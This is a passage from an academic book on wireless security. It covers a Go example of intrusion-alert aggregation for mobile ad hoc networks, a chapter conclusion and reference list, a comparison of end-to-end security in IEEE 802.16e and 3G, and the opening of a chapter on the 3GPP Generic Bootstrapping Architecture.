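		{"N1", "X", 1}, {"N2", "X", 1}, {"N3", "X", 1},
		{"N4", "Y", 1}, {"N4", "Y", 1}, {"N4", "Y", 1},
		{"N9", "Z", 2},
	}
}

func main() {
	agg := NewZoneAggregator(1, 2)
	for _, a := range SampleAlerts() {
		agg.Receive(a)
	}
	fmt.Println("confirmed:", agg.Confirmed(), "dropped:", agg.Dropped()) // confirmed: [X] dropped: 1
}
```

With a quorum of 2 the aggregator confirms X (three distinct reporters), does not confirm Y (one reporter, three repeats), and drops the zone-2 alert about Z. The overhead trade-off the text mentions shows up in the quorum: a lower value lets one honest node trigger a response sooner, a higher value needs more local broadcasts before the interzone node will correlate anything.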



The solution can offer multiple lines of defense against both known and unknown security threats.

Besides the problems described above, how to adapt the security mechanisms in a large-scale wireless network is also an interesting problem. The scalability of security mechanisms and the compromise between security and network scalability are certainly topics worth further research study.

Conclusion

With the rapid proliferation of wireless networks and mobile computing applications, MANETs have received increased attention. Security is an important feature for ad hoc networks, especially in untrustworthy environments such as battlefields. Development of security solutions for ad hoc networks has therefore become a major research concern.

However, the characteristics of ad hoc networks have not only introduced vulnerabilities to malicious attacks varying from passive eavesdropping to active interfering, but also imposed difficulty and challenges in introducing security features to MANETs.

This book chapter has discussed the security vulnerabilities, challenges, and security solutions for MANETs. A variety of attacks and their countermeasures have been identified for different network operations, mechanisms, and network layers. Existing research efforts as well as the open challenges were discussed in the chapter.

REFERENCES

Aad, I., Hubaux, J.-P., & Knightly, E.W. (2004). Denial of service resilience in ad hoc networks. In Proceedings of the ACM International Conference on Mobile Computing and Networking (MobiCom 2004), Philadelphia, (pp. 202-215).

Albers, P., Camp, O., Percher, J., Jouga, B., Me, L., & Puttini, R. (2002). Security in ad hoc networks: A general intrusion detection architecture enhancing trust based approaches. In Proceedings of the 1st International Workshop on Wireless Information Systems (WIS-2002) (pp. 1-12).

Anderegg, L., & Eidenbenz, S. (2003). Routing and forwarding: Ad hoc-VCG: A truthful and cost-efficient routing protocol for mobile ad hoc networks with selfish agents. In Proceedings of the 9th Annual International Conference on Mobile Computing and Networking (MobiCom 2003), San Diego, (pp. 245-259). ACM Press.

Avantvalee, T., & Wu, J. (2006). A survey on intrusion detection in mobile ad hoc networks. In Y. Xiao, X. Shen, & D.-Z. Du (Eds.), Wireless/mobile network security (pp. 170-196).

Balfanz, D., Smetters, D.K., Stewart, P., & Wong, H.C. (2002). Talking to strangers: Authentication in ad-hoc wireless networks. Paper presented at the Symposium on Network and Distributed Systems Security (NDSS '02), San Diego.

Buchegger, S., & Boudec, J.L. (2001). The selfish node: Increasing routing security in mobile ad hoc networks (IBM Research Report: RR 3354).

Buchegger, S., & Boudec, J.L. (2002a). Nodes bearing grudges: Towards routing security, fairness, and robustness in mobile ad hoc networks. In Proceedings of the Tenth Euromicro Workshop on Parallel, Distributed and Network-based Processing, Canary Islands, Spain, (pp. 403-410). IEEE Computer Society.

Buchegger, S., & Boudec, J.L. (2002b). Performance analysis of the CONFIDANT protocol: Cooperation of nodes - fairness in dynamic ad-hoc networks. In Proceedings of IEEE/ACM Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc), Lausanne, CH, (pp. 226-236). ACM Press.

Buttyán, L., & Hubaux, J.P. (2000). Enforcing service availability in mobile ad-hoc WANs. In Proceedings of Workshop on Mobile Ad-hoc Networking and Computing (MobiHOC), Boston, (pp. 87-96).

Buttyán, L., & Hubaux, J.P. (2003). Stimulating cooperation in self-organizing mobile ad hoc networks. Mobile Networks and Applications, 8(5), 579-592.



Cagalj, M., Ganeriwal, S., Aad, I., & Hubaux, J.-P. (2004). On cheating in CSMA/CA ad hoc networks (Tech. Rep. IC/2004/27, EPFL-DI-ICA). Lausanne, Switzerland: Swiss Federal Institute of Technology Lausanne.

Capkun, S., Buttyan, L., & Hubaux, J.-P. (2003). Self-organized public-key management for mobile ad hoc networks. IEEE Transactions on Mobile Computing, 2(1), 52-64.

Chan, A.C.-F. (2004). Distributed symmetric key management for mobile ad hoc networks. In Proceedings of the 23rd Annual Joint Conference of the IEEE Computer and Communications Societies (INFOCOM), Hong Kong, China, (pp. 2414-2424). IEEE.

Crepeau, C., & Davis, C.R. (2003). A certificate revocation scheme for wireless ad hoc networks. In Proceedings of the 1st ACM Workshop on Security of Ad Hoc and Sensor Networks, Fairfax, Virginia, (pp. 54-61). ACM Press.

Gupta, V., Krishnamurthy, S., & Faloutsos, M. (2002). Denial of service attacks at the MAC layer in wireless ad hoc networks. In Proceedings of MILCOM.

Hu, Y.C., Johnson, D., & Perrig, A. (2002). SEAD: Secure efficient distance vector routing for mobile wireless ad hoc networks. In Proceedings of the 4th IEEE Workshop on Mobile Computing Systems and Applications (WMCSA '02), Callicoon, New York, (pp. 3-13).

Hu, Y.C., Perrig, A., & Johnson, D. (2002). Ariadne: A secure on-demand routing protocol for ad hoc networks. In Proceedings of the 8th ACM International Conference on Mobile Computing and Networking (MobiCom), Atlanta, Georgia, (pp. 12-23). ACM Press.

Hu, Y.C., Perrig, A., & Johnson, D. (2003a). Packet leashes: A defense against wormhole attacks in wireless ad hoc networks. In Proceedings of the Twenty-Second Annual Joint Conference of the IEEE Computer and Communications Societies (INFOCOM 2003) (pp. 1976-1986). IEEE.

Hu, Y.C., Perrig, A., & Johnson, D. (2003b). Rushing attacks and defense in wireless ad hoc network routing protocols. In Proceedings of ACM WiSe 2003, San Diego, (pp. 30-40). ACM Press.

IEEE. (1999). Standard for wireless LAN-medium access control and physical layer specification, P802.11.

Jha, S., Tan, K., & Maxion, R. (2001). Markov chains, classifiers, and intrusion detection. In Proceedings of the 14th IEEE Computer Security Foundations Workshop, Cape Breton, Nova Scotia, Canada, (pp. 206-219).

Johnson, D.B., Maltz, D.A., & Hu, Y. (2004). The dynamic source routing protocol for mobile ad hoc networks (DSR). INTERNET DRAFT, MANET working group. Retrieved November 17th, 2006, from http://www.ietf.org/internet-drafts/draft-ietf-manet-dsr-10.txt

Jones, A. (2000). Game theory: Mathematical models of conflict (pp. 210-236). Horwood Publishing.

Kachirski, O., & Guha, R. (2003). Effective intrusion detection using multiple sensors in wireless ad hoc networks. In Proceedings of the 36th Annual Hawaii International Conference on System Sciences (HICSS '03) (pp. 57.1-57.8). IEEE.

Kong, J., Zerfos, P., Luo, H., Lu, S., & Zhang, L. (2001). Providing robust and ubiquitous security support for mobile ad hoc networks. In Proceedings of the 9th International Conference on Network Protocols (ICNP) (pp. 251-260). ACM Press.

Konorski, J. (2001). Protection of fairness for multimedia traffic streams in a non-cooperative wireless LAN setting. Paper presented at PROMS (LNCS 2213, pp. 116-129). Springer.

Konorski, J. (2002). Multiple access in ad-hoc wireless LANs with noncooperative stations. Networking (LNCS 2345, pp. 1141-1146). Springer.

Kyasanur, P., & Vaidya, N.H. (2005). Selfish MAC layer misbehavior in wireless networks. IEEE Transactions on Mobile Computing, 4(5), 502-516.



Lu, B., & Pooch, U.W. (2005). A lightweight authentication protocol for mobile ad hoc networks. In Proceedings of the International Conference on Information Technology: Coding and Computing (ITCC '05), Las Vegas, (pp. 546-551). ACM Press.

Mackenzie, A.B., & Wicker, S.B. (2000). Game theory and the design of self-configuring, adaptive wireless networks. IEEE Communications Magazine, 39(11), 126-131.

Mackenzie, A.B., & Wicker, S.B. (2003). Stability of multipacket slotted aloha with selfish users and perfect information. In Proceedings of Infocom 2003, San Francisco, (pp. 1583-1590). IEEE.

Macker, J., & Chakeres, I. (2006). Mobile ad-hoc networks (MANET). Retrieved November 17th, 2006, from http://www.ietf.org/html.charters/manet-charter.html

Marti, S., Giuli, T., Lai, K., & Baker, M. (2000). Mitigating routing misbehavior in mobile ad hoc networks. In Proceedings of the 6th ACM International Conference on Mobile Computing and Networking (MobiHoc '05), Urbana Champaign, IL, (pp. 255-265). ACM Press.

Michiardi, P., & Molva, R. (2002a). CORE: A collaborative reputation mechanism to enforce node cooperation in mobile ad hoc networks. Paper presented at the Sixth IFIP Conference on Security, Communications, and Multimedia (CMS 2002), Portoroz, Slovenia.

Michiardi, P., & Molva, R. (2002b). Game theoretic analysis of security in mobile ad hoc networks (Tech. Rep. RR-02-070). Institut Eurecom.

Mohan, M., & Joiner, L.L. (2004). Solving billing issues in ad hoc networks. In Proceedings of ACMSE '04, Huntsville, AL, (pp. 31-36). ACM Press.

Nash, J. (1950). The bargaining problem. Econometrica, 18, 155-162. The Econometric Society.

Papadimitratos, P., & Haas, Z.J. (2002). Secure routing for mobile ad hoc networks. Paper presented at the SCS Communication Networks and Distributed Systems Modeling and Simulation Conference (CNDS 2002), San Antonio, TX.

Perkins, C.E. (Ed.). (2001). Ad hoc networks. Upper Saddle River, NJ: Addison-Wesley.

Perkins, C.E., Belding-Royer, E.M., & Das, S.R. (2003). Ad hoc on-demand distance vector (AODV) routing. Internet request for comments RFC 3561. Retrieved November 17th, 2006, from http://www.ietf.org/rfc/rfc3561.txt

Perkins, C.E., & Bhagwat, P. (1994). Highly dynamic destination-sequenced distance-vector routing (DSDV) for mobile computers. Paper presented at the ACM Conference on Communications Architectures, Protocols and Applications (SIGCOMM '94), London, (pp. 234-244). ACM Press.

Perrig, A., Canetti, R., Song, D., & Tygar, D. (2001). Efficient and secure source authentication for multicast. In Proceedings of Network and Distributed System Security Symposium (NDSS '01), San Diego, CA, (pp. 35-46).

Perrig, A., Canetti, R., Tygar, D., & Song, D. (2000). Efficient authentication and signing of multicast streams over lossy channels. In Proceedings of IEEE Symposium on Security and Privacy, Berkeley, CA, (pp. 56-73). IEEE.

Perrig, A., Canetti, R., Tygar, D., & Song, D. (2002, Summer). The TESLA broadcast authentication protocol. RSA CryptoBytes, 5, 2-13.

Radosavac, S., Baras, J.S., & Koutsopoulos, I. (2005). A framework for MAC protocol misbehavior detection in wireless networks. Paper presented at the Wireless Security Workshop (WiSe '05), Cologne, Germany, (pp. 33-42).

Radosavac, S., Cardenas, A., Baras, J.S., & Moustakides, G. (2006). Detecting IEEE 802.11 MAC layer misbehavior in ad hoc networks: Robust strategies against individual and colluding attackers. Journal of Computer Security: Special Issue on Security of Ad Hoc and Sensor Networks, 15 (2007), 103-128.

Raya, M., Hubaux, J.-P., & Aad, I. (2004). DOMINO: A system to detect greedy behavior in IEEE



802.11 hotspots. In Proceedings of the Second International Conference on Mobile Systems, Applications, and Services (MobiSys '04), Boston, MA, (pp. 84-97).

Rivest, R.L., Adleman, L., & Dertouzos, M.L. (1978). On data banks and privacy homomorphisms (pp. 169-179). Foundations of secure computation. Academic Press.

Salem, N.B., Buttyan, L., Hubaux, J.-P., & Jakobsson, M. (2003). A charging and rewarding scheme for packet forwarding in multi-hop cellular networks. In Proceedings of MobiHoc '03, Annapolis, MD, (pp. 13-24). ACM Press.

Sanzgiri, K., Dahill, B., Levine, B.N., Shields, C., & Royer, E.M. (2002). A secure routing protocol for ad hoc networks. In Proceedings of the 10th IEEE International Conference on Network Protocols (ICNP '02), Paris, (pp. 78-87). IEEE.

Song, N., Qian, L., & Li, X. (2005). Wormhole attacks detection in wireless ad hoc networks: A statistical analysis approach. In Proceedings of the 19th IEEE International Parallel and Distributed Processing Symposium (IPDPS '05), Denver, CO, (pp. 289-296).

Srinivasan, V., Nuggehalli, P., Chiasserini, C.F., & Rao, R.R. (2003). Cooperation in wireless ad hoc networks. In Proceedings of IEEE INFOCOM, San Francisco, (pp. 808-817).

Stajano, F., & Anderson, R.J. (1999). The resurrecting duckling: Security issues for ad-hoc wireless networks. In B. Christiano, B. Crispo, & M. Roe (Eds.), Security Protocols, 7th International Workshop Proceedings (LNCS, vol. 1796, pp. 172-194).

Sterne, D., Balasubramanyam, P., Carman, D., Wilson, B., Talpade, R., Ko, C., et al. (2005). A general cooperative intrusion detection architecture for MANETs. In Proceedings of the 3rd IEEE International Workshop on Information Assurance (IWIA '05), Oahu, HI, (pp. 57-70).

Sun, B., Wu, K., & Pooch, U.W. (2003). Alert aggregation in mobile ad hoc networks. In Proceedings of the 2003 ACM Workshop on Wireless Security (WiSe '03) in conjunction with the 9th Annual International Conference on Mobile Computing and Networking (MobiCom '03), San Diego, (pp. 69-78). ACM Press.

Venkatraman, L., & Agrawal, D. (2000). A novel authentication scheme for ad hoc networks. Paper presented at the IEEE Wireless Communications and Networking Conference (WCNC 2000), Chicago, IL, (Vol. 3, pp. 1268-1273). IEEE.

Weimerskirch, A., & Thonet, G. (2001). A distributed light-weight authentication model for ad-hoc networks. In Proceedings of the 4th International Conference on Information Security and Cryptology (ICISC 2001), Seoul, Korea, (pp. 341-354). ACM Press.

Xu, W., Trappe, W., Zhang, Y., & Wood, T. (2005). The feasibility of launching and detecting jamming attacks in wireless networks. In Proceedings of the Sixth ACM International Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc '05), Urbana Champaign, IL, (pp. 48-57). ACM Press.

Yang, H., Luo, H., Ye, F., Lu, S., & Zhang, L. (2004). Security in mobile ad hoc networks: Challenges and solutions. IEEE Wireless Communications, 11(1), 38-47.

Zapata, M.G. (2006). Secure ad hoc on-demand distance vector (SAODV) routing. INTERNET DRAFT, MANET working group. Retrieved December 12th, 2006, from http://www.ietf.org/internet-drafts/draft-guerrero-manet-saodv-06.txt

Zhang, Y., Lee, W., & Huang, Y. (2003). Intrusion detection techniques for mobile wireless networks. ACM Wireless Networks Journal (WINET), 9(5), 545-556. ACM/Kluwer Press.

Zhong, S., Chen, J., & Yang, Y.R. (2003). Sprite: A simple, cheat-proof, credit-based system for mobile ad-hoc networks. In Proceedings of IEEE Infocom, San Francisco, (pp. 1987-1997). IEEE.

Zhou, L., & Haas, Z. (1999). Securing ad hoc networks. IEEE Network, 13(6), 24-30.

Zhu, S., Xu, S., Setia, S., & Jajodia, S. (2003). LHAP: A lightweight hop-by-hop authentication


End-to-End Security Comparisons Between IEEE 802.16e and 3G Technologies

bi-directional certificate exchange for mutual authorization is required. This is achieved by Rivest-Shamir-Adleman (RSA)-based mutual authorization based on PKMv2.
• Support of key hierarchy: To support key hierarchy, Temporal Key Integrity Protocol (TKIP) is used through utilization of the master key (MK) and the pairwise master key (PMK) schemes.
• PKM and EAP message protections: EAP has been known to cure security vulnerabilities, such as the lack of user identity protection and MITM attacks. This requires enabling encryption and utilizing PKM EAP messages for user authentication. To fix the previous problems, PKM messages should be bi-directional and EAP messages should use a four-way handshaking scheme.
• Weakness in the X.509 certificates: The X.509 certificate has the following issues:
  ◦ It is restricted to a certain business model, and flexibility is a major issue.
  ◦ It does not support user-based identity authentication, due to the fact that devices and services are greatly coupled, and
  ◦ Trusting a certificate authority (CA) could become a source of a new attack.
• Poor IV construction: Initialization vectors (IVs) often use similar and repetitive structures. Through traffic pattern analysis, IVs can easily be known and broken. To remedy this, more complex IV structures with high key-bits (at least 128 bits) are needed.
• 802.16 key exchange issues: A 2-key 3DES based key wrap is currently the standard of the initial draft for TEK exchange, which is not as strong (82 bits) as the TEK keys (128 bits) it carries. There should be a mechanism to ensure that TEKs do not repeat for frequent exchange of TEKs. This could suffer from replay attacks, since there is no liveliness in the key exchange protocol, and it also suffers from MITM attacks. Adding the EAP-TLS authentication framework and the AES-CCM cipher suite will solve the problem.
• Security improvement suggestions: As a summary, the following security improvements are suggested for Mobile-WiMAX (as well as 802.16d):
  ◦ PKM requires mutual authentication (PKMv2), necessary protections against replay, and a stronger than DES-CBC cipher suite.
  ◦ Deployment models should include additional security features for performance related issues (fast roaming, etc.).
  ◦ The current security models and solutions are not able to fully utilize the core network AAA infrastructures due to the very low PKI support.
  ◦ A single X.509 credential has limitations. To overcome this, it's recommended to use a flexible protocol, such as EAP, which supports multiple user credentials.
  ◦ A scalable security solution is required to be deployed into the existing architecture and infrastructure for 802.16e requirements.

E2E Security Architecture

Figure 10 conceptually displays a client-server-based (i.e., VoIP) E2E AAA on 802.16 networks offering portability and fully mobile operations. The architecture is built around the three-party protocol (PKMv2) as defined in 802.16e (Agis et al., 2004).

Figure 10 shows that the over-the-air security association (authentication and encryption) is established through the PKM-EAP protocol. This is a complete client/server architecture, where EAP carries the AAA backend connectivity using RADIUS or Diameter. EAP offers strong support for key-driven cipher mechanisms (i.e., EAP-MSCHAPv2 and EAP-AKA). It is also recommended to use an E2E tunneling protocol such as protected EAP



Figure 10. 802.16 E2E security framework (supplicant, AP (access point) authenticator, authentication server)

1. The supplicant sends an EAP-start message; the AP receives the message.
2. The AP replies with an EAP-request ID.
3. Protected EAP (PEAP) / Tunneled TLS (TTLS): the AP forwards the messages to the authentication server, which verifies the client's identity, bound by EAP over RADIUS/Diameter.
4. The supplicant receives the Accept/Reject message.
5. If accepted, start PKMv2/EAP with AES.
7. If rejected, the end.

(PEAP) or tunneled TLS (TTLS) for the purpose of mutual authentication and a 128-bit or better TLS encryption method to further fortify the E2E security strength (particularly where weaker EAP methods may be deployed).

CONCLUSION

In this chapter, E2E security schemes were discussed for 3G technologies (GSM, GPRS, and CDMA) and for Mobile-WiMAX (802.16e). The weaknesses of the initial drafts were pointed out and different enhancements were suggested. In most cases, mutual authentication as well as strong algorithms for authentication and authorization solved the E2E problems.

Comparing the performance issue, GSM systems have been around for a while and the designed architecture had not taken much security into account due to the security issues not being severe at the time. However, as the technology matured, the newer technologies integrated more security aspects in their initial drafts, such as in CDMA. Now Mobile-WiMAX is expected to overcome all security issues and develop a full-scale E2E architecture with high-performance E2E availability and security options. The encryption/authentication/authorization strengths of EAP/TLS/CCMP/PKM are unbeatable.

REFERENCES

Agis, E., Mitchel, H., Ovadia, S., Aissi, S., Bakshi, S., Iyer, P., et al. (2004, August 20). Extending WiMAX technology to mobility. Global, Interoperable Broadband Wireless Networks, Intel Journal, 8(03). ISSN 1535-864X.

Aydemir, O., & Selcuk, A. A. (2005). GUAP: A strong user authentication protocol for GSM. Bilkent University, Turkey.

Campbell, R., Mckunas, D., Myagmar, S., Gupta, V., & Briley, B. (2002, June 28). Analysis of third generation mobile security. Annual Motorola Project Review.

Chang, D. (2002, January). Security along the path through GPRS towards 3G mobile telephone network data services. Bethesda, MD: SANS Institute.

Code division multiple access (CDMA) end-to-end security positioning paper. (2005). Nortel Networks.

Gallop, J. (2005, April 14). The state of the art. WP22. D21 2. Volume 2. Retrieved from http://www.akogrimo.org/modules.php?name=UpDownload&req=getit&lid=16

GPRS Security Threats and Solutions. (2002). A white paper by NetScreen Technologies Inc. Retrieved from http://www.firewall-reviews.com/documents/ACFKM4dU8.pdf



Johnston, D. (2003, September 3). IEEE 802.16 security enhancements. Retrieved from http://www.ieee802.org/16/tgd/contrib/C80216d-03_60.pdf

Kitsos, P., Galanis, M. D., & Koufopavlou, O. (2004, May 23-26). High-speed hardware implementations of the KASUMI block cipher. In Proceedings of the 2004 International Symposium on Circuits and Systems, ISCAS '04, Volume 2.

Kitsos, P., Sklavos, N., & Koufopavlou, O. (2004, May 12-14). An end-to-end hardware approach security for the GPRS. In IEEE Mediterranean Electrotechnical Conference.

Mandin, J. Secure association establishment for PKM-EAP, IEEE 802.16 Broadband Wireless Access Working Group Project, 2004-03-17. Retrieved from http://www.ieee802.org/16/tge/contrib/C80216e-04_46r1.pdf

Mynttinen, J. (2000, November 27). End-to-end security of mobile data in GSM. Helsinki University of Technology, Finland.

Pagliusi, P. S. (2002). A contemporary foreword on GSM security. Retrieved from http://jazi.staff.ugm.ac.id/IC3-Royal%20Holloway/GSM_Security_v4.pdf

Part 16: Air interface for fixed and mobile broadband wireless access systems. (2004). Draft IEEE Standard for Local and Metropolitan Area Networks. Retrieved from http://ieeexplore.ieee.org/iel5/10676/33683/01603394.pdf

Puthenkulam, J., & Mandin, J. 802.16e security adhoc proposal, IEEE C802.16e-03/70, IEEE 802.16 Presentation Submission Template (Rev. 8.3). Retrieved Nov 13, 2003, from http://www.ieee802.org/16/tge/contrib/C80216e-03_70.pdf

Soyjaudah, K. M. S., Hosany, M. A., & Jamaloodeen, A. (2004, October 24-26). Design and implementation of Rijndael algorithm for GSM encryption. In Mobile Future, 2004 and the Symposium on Trends in Communications (SympoTIC '04). Joint IST Workshop.

KEY TERMS

Authentication, Authorization, and Accounting (AAA): AAA is an access control scheme, overseeing the auditing framework and policy enforcement for commercial access and computing systems.

Code Division Multiple Access (CDMA): CDMA is also a 2.5G technology offering codes for multiplexing various cell calls. Therefore it does not divide the channel into time slots (time division multiple access [TDMA]) or frequency bands (frequency division multiple access [FDMA]). Instead, CDMA encodes data with codes associated with every channel; therefore they do not have any overlaps in time or frequency bands. CDMA is a major improvement in cellular technologies.

Customer-Premises Equipment (CPE): End communication device that local subscribers communicate to. Through CPE, the information transmitted to and from all local subscribers is transmitted back to the centre.

End-to-End (E2E): E2E security covers the system's security functionality and performance from one end to the other and back.

General Packet Radio Service (GPRS): GPRS is an extension to GSM technology, which offers higher data rates compared to GSM. GPRS is considered a 2.5G technology.

Global System for Mobile Communications (GSM): GSM is the most popular standard and one of the oldest technologies still used for cellular networks throughout the world. GSM is considered a 2G cellular technology with digital integration.

Initialization Vector (IV): IV is a block of bit streams that is attached to every security data to produce a unique and independent stream for encryption.

Mobile Subscriber Station (MSS) = Mobile Station (MS): These are end-user devices.


End-to-End Security Comparisons Between IEEE 802.16e and 3G Technologies

Pairwise Master Key (PMK): PMK is used in peer-to-peer communication schemes for sharing a master key that would last the entire session. This is mainly used for data encryption and integrity.

Privacy Key Management (PKM): PKM is a private key scheme used with EAP and TLS for providing E2E security schemes for wireless technologies.

Third and Fourth Generation (3G/4G): 3G/4G cellular networks are used in the context of mobile standards. The services associated with 3G are capable of transferring both voice and non-voice data simultaneously. Though not official yet, the 4G, however, will be fully IP-based, converging wired and wireless access technologies. It is expected to reach bandwidth within a few hundred megabit per second, offering E2E QoS (Endnote 1).

Transport Layer Security (TLS): TLS is used mostly in client/server applications, which require endpoint authentication and communications privacy, particularly over the Internet. This is mostly done using cryptographic measures.

Virtual Private Network (VPN): VPN is a communications tunnel that uses a pre-existing (and often unsecure, such as the Internet) network to connect a remote user to a corporate network. The information is tunneled, encapsulated, and encrypted when it passes through the unsecure network. Once the information reaches the destination, it is decapsulated and decrypted.

Worldwide Interoperability for Microwave Access (WiMAX): WiMAX has been defined by the WiMAX Forum, formed in 2001. WiMAX is also known as the IEEE 802.16 standard, officially titled WirelessMAN, and is an alternative to DSL (802.16d) and cellular access (802.16e).

ENDNOTE

1 Kim, Y. K., & Prasad, R. 4G roadmap and emerging communication technologies. Artech House.




Chapter XXIV
Generic Application Security in
Current and Future Networks
Silke Holtmanns
Nokia Research Center, Finland

Pekka Laitinen
Nokia Research Center, Finland

ABSTRACT

This chapter outlines how cellular authentication can be utilized for generic application security. It describes the basic concept of the generic bootstrapping architecture (GBA) that was specified by the 3rd generation partnership project (3GPP) for current networks and outlines the latest developments for future networks. The chapter will provide an overview of the latest technology trends in the area of generic application security.

INTRODUCTION

Applications in wireless networks require a very reliable method for user authentication and communication security. We will outline the reasons for the security needs of mobile applications compared to Internet application security. The chapter starts with the application specific security approach used today by many mobile operators and describes the motivation that led to the development of the generic bootstrapping architecture (GBA) of the 3rd generation partnership project (3GPP). The main function of GBA and also its dialects and variations are explained. GBA has been adopted by various standardization bodies and is used by many applications. GBA was first embraced by mobile applications, like the 3GPP Mobile Broadcast Multicast Service, the open mobile alliance (OMA) presence service, the OMA broadcast smart card service protection profile, the GBA profile, and so forth. The ongoing convergence of fixed and mobile networks resulted in the adaptation of GBA-based application security for fixed and cable networks. We close with a snapshot of the ongoing work for

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Generic Application Security in Current and Future Networks

application security in beyond third generation (B3G) networks.

APPLICATION SECURITY FOUNDATIONS IN MOBILE NETWORKS

Special Requirements for Mobile Application Security

Applications in wireless networks require a very reliable method for user authentication and communication security due to their special environment. There are the following security reasons for this:

• The communication to the service provider goes over the air and can be eavesdropped or modified, if not properly secured.
• The service may be offered over any kind of IP-based channel; then the protection of the service by the underlying bearer protocol can not be taken for granted. The authentication and the service usage may be performed over different channels.
• Username/password authentication is not very secure or user friendly on a mobile device with a numeric keypad; hence the temptation to choose too short or easy-to-write passwords is even greater than in the fixed network environment.

Operators or third parties that provide server-based applications in mobile networks have to face additional challenges that reflect on the choice of a potential security solution for application security:

• Roaming agreements: The home operator of a user may be liable to roaming partners or application providers, if an unauthorized user uses a service. This potential liability could even be exploited by malicious application providers. This is no empty threat, as the malicious usage of premium short message service (SMS) is an existing problem.
• Development costs: Development of mobile applications is much more expensive than that for Internet usage; hence if an application is seriously compromised, then the resulting loss is much higher.
• Updating problem: In the fixed network environment security patches and updates are a daily occurrence; this is not that common in the mobile environment, even if some mobile software platforms offer the possibility to be updated via a PC or over-the-air (OTA) mechanisms.
• Protection of investments: Mobile operators make big investments in their network infrastructure; hence re-usage of deployed network nodes needs to be taken into account. Especially when new services are rolled out, these services should work in a harmonic way with the existing nodes.
• Existing smart card base: Operators hand out smart cards to their subscribers; these cards have very different capabilities (e.g., subscriber identity module (SIM) cards, universal SIM [USIM], etc.), and operators are unlikely to replace already handed out smart cards. It is more likely that the user replaces the device. A smart card is replaced when a user changes operators.
• Service usage costs: The cost of browsing is bound to the type of access the user is using. When mobile access is used, this may imply some significant costs for the user. Also, some mobile service fees already include the access cost, that is, the user does not have to pay twice for the content and the delivery. Hence, user authentication comes in mobile applications "earlier" than in the Internet case.
• Reliability and availability: If an Internet application does not work, because the authentication database crashed, then in many cases this is not that severe an issue and the user can still use other services (except for those 100% online shops like amazon.com). But if the operator's subscriber database can not be reached, users can not make phone calls, roam, send SMS messages, and, in the end, the operator has no opportunity to offer


any kind of service and obtain revenue. The availability and reliability requirements for mobile network nodes are very high.
• Scalability: Scalability of mobile network security solutions is a critical factor. Solutions are standardized on a global level, for example, for small local operators as well as for large international operators. Hence, solutions have to work also for millions of people at the same time and it must be possible to extend them gradually depending on the growing subscriber base. Usage scenarios and scalability requirements, where a whole full soccer arena at once requests one service server and still the service should work and start on time, are not unusual.
• Convergence: For operators that run both fixed and mobile networks the issue of convergence gains importance, since it allows a more flexible re-use of the network backend servers and functions.

When the first mobile applications started after voice and SMS, the requirements for a more generic application security were not clear. This resulted in a fast-to-roll-out, but less generic approach, as will be explained next.

Historic Approaches to Application Security

Application nodes in mobile networks in the past tend to have a monolithic security solution that is highly customized to the individual application. This has to do with the fact that operators like to buy their equipment from various vendors, and re-usage and extension of existing infrastructure requires standardized interfaces. This standardization takes quite some time, and backward compatibility and integration with the existing nodes is a big challenge. Another argument for having a customized security solution was that there were not that many new applications, and they were not expected to come at a fast pace. For application security the return on investment was also an important consideration. The system had first to attract some subscribers and be accepted, before an expensive security solution of higher quality is considered, that is, why spend a lot of money, if it will not be used. This subsection describes how application security is often managed today and how it was managed in the past and what the problems related to it are:

• Voice: The terminal authenticates to the network utilizing a shared secret stored in the smart card and the operator's subscriber database. For application security needs, the authentication vectors (AVs) are distributed to the corresponding nodes.
• Early IP multimedia subsystem security (IMS): The 3GPP early IMS security solution of Release 6 (3GPP, TR 33.978, Release 6) uses IP address binding, that is, the IP address assigned by the gateway GPRS support node (GGSN) is used for subsequent user authentication to the IMS service.
• IMS: The IMS security is bound to the credentials of the IMS SIM (ISIM) application on the universal integrated circuit card (UICC) smart card, and these credentials are used by the mobile terminal for authentication to the IMS network. This is outlined by 3GPP (TS 33.203, Release 6). The user authentication is delegated from the operator's subscriber database towards the IMS network (i.e., the serving call-session-control-function [S-CSCF]).

The first mobile application was voice, and few people envisioned the further usage mobile networks would get and were surprised by the popularity of SMS. 3GPP IMS with its wide range of service possibilities has security-wise two flavors: (1) IP address binding, which comes quite inexpensive to mobile operators, and (2) the full IMS security, which requires that the subscriber is equipped with a new smart card that contains an ISIM application on it. The early IMS security solution has its cost-wise advantages and allows a roll-out and provisioning of the service also to subscribers with "old" smart cards, but the usage of monolithic and application specific security solutions causes some problems. Additionally, the direct usage of AVs in applications causes some



general problems that require a more generic approach. The specific and general issues are listed as follows:

• Fraud potential: With the convergence of networks, IP address spoofing may become a threat for application specific solutions that utilize IP address binding.
• Scalability: The IP address binding solution is not very well scalable for large networks and large amounts of simultaneous service users. It is difficult to scale for many application scenarios in diverse future networks, where users may roam between network types.
• Performance and dependability: The backbone subscriber database, that is, the home subscriber server (HSS) or the home location register-authentication center (HLR-AuC), should not be contacted too often to obtain fresh user credentials, since these databases are very large, and if this database goes down due to overload requests from application servers, then the operator can not even offer simple voice calls.
• Synchronization problems: If a new application utilizes the smart card based authentication, then it consumes AVs from the HSS/HLR-AuC. This can lead to sequence number synchronization problems, which become more severe when the number of services increases.
• User experience: Different user authentication methods often result in bad user experience and difficulties for the help-desk if the authentication fails for unknown reasons.
• Combined networks: If an operator has broadband fixed network access and mobile networks, then the broadband subscriber may not have the ISIM or the IP address assigned from the GGSN.
• Future proof: New applications need new security solutions. If the network is structured in separate monolithic pillars, then the re-usage of the existing infrastructure for security is very difficult without modifying the already deployed infrastructure. Since in telecommunication availability is a critical factor, the modification of well-running systems is a very sensitive issue.

There were some early non-standardized approaches to re-use the existing authentication infrastructure of an operator for general application specific security (Gerstenberger, Lahaije, & Schuba, 2004). The aforementioned issues led in 3GPP and 3GPP2 to the standardization of the GBA.

Generic Bootstrapping Architecture (GBA)

We will now introduce the GBA nodes, the provided functionality, and the interworking. The main goal of GBA is to provide a common shared secret to an application server and a mobile terminal based on the cellular authentication; the details of this protocol are described in the 3GPP technical specification (3GPP TS 33.220, Release 6), and we will focus on this aspect.

